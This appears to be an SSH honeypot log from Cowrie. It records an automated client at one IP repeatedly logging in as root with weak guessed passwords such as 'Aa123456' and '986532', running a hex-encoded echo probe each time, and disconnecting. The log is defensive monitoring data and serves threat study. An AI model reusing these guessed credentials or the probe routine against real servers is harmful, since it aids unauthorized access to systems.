{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:23.565309Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.565966Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.589737Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.590636Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46200,"dst_ip":"1.2.3.4","dst_port":22,"session":"b372de0005f5","protocol":"ssh","message":"New connection: 212.227.125.160:46200 (1.2.3.4:22) [session: b372de0005f5]","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.611567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.613610Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.642164Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.739831Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:23.868352Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.869015Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.893012Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.894112Z","src_ip":"212.227.125.160","session":"b372de0005f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46204,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfb4f4615f06","protocol":"ssh","message":"New connection: 212.227.125.160:46204 (1.2.3.4:22) [session: dfb4f4615f06]","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.915265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.919718Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.946980Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.login.success","username":"root","password":"986532","message":"login attempt [root/986532] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.149604Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:24.373075Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.374176Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.466338Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.467501Z","src_ip":"212.227.125.160","session":"dfb4f4615f06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46212,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e14a67ea498","protocol":"ssh","message":"New connection: 212.227.125.160:46212 (1.2.3.4:22) [session: 8e14a67ea498]","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.495330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.596032Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:24.597337Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.login.success","username":"root","password":"951951","message":"login attempt [root/951951] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.022204Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:25.377059Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.377752Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.496402Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.497595Z","src_ip":"212.227.125.160","session":"8e14a67ea498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46222,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd3d67f3afb","protocol":"ssh","message":"New connection: 212.227.125.160:46222 (1.2.3.4:22) [session: bbd3d67f3afb]","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.578442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.687969Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:25.688862Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.login.success","username":"root","password":"78963214","message":"login attempt [root/78963214] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.280775Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:26.656851Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.657519Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.733311Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.734406Z","src_ip":"212.227.125.160","session":"bbd3d67f3afb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46224,"dst_ip":"1.2.3.4","dst_port":22,"session":"437f56999256","protocol":"ssh","message":"New connection: 212.227.125.160:46224 (1.2.3.4:22) [session: 437f56999256]","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.764451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.810701Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.811387Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.login.success","username":"root","password":"4","message":"login attempt [root/4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:26.974617Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:27.097119Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.097936Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.145704Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.146904Z","src_ip":"212.227.125.160","session":"437f56999256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46238,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf7fe07a668","protocol":"ssh","message":"New connection: 212.227.125.160:46238 (1.2.3.4:22) [session: cdf7fe07a668]","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.167243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.184124Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.205590Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.login.success","username":"root","password":"326159487","message":"login attempt [root/326159487] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.324169Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:27.391736Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.392458Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.416104Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.417082Z","src_ip":"212.227.125.160","session":"cdf7fe07a668"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46240,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9a21072c5c5","protocol":"ssh","message":"New connection: 212.227.125.160:46240 (1.2.3.4:22) [session: a9a21072c5c5]","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.437788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.448524Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.472475Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.login.success","username":"root","password":"321456987","message":"login attempt [root/321456987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.606543Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:27.770255Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.771078Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.799536Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.800854Z","src_ip":"212.227.125.160","session":"a9a21072c5c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46254,"dst_ip":"1.2.3.4","dst_port":22,"session":"c279cd6292a8","protocol":"ssh","message":"New connection: 212.227.125.160:46254 (1.2.3.4:22) [session: c279cd6292a8]","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.823442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.844434Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.867256Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
{"eventid":"cowrie.login.success","username":"root","password":"311087","message":"login attempt [root/311087] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:27.947819Z","src_ip":"212.227.125.160","session":"c279cd6292a8"}
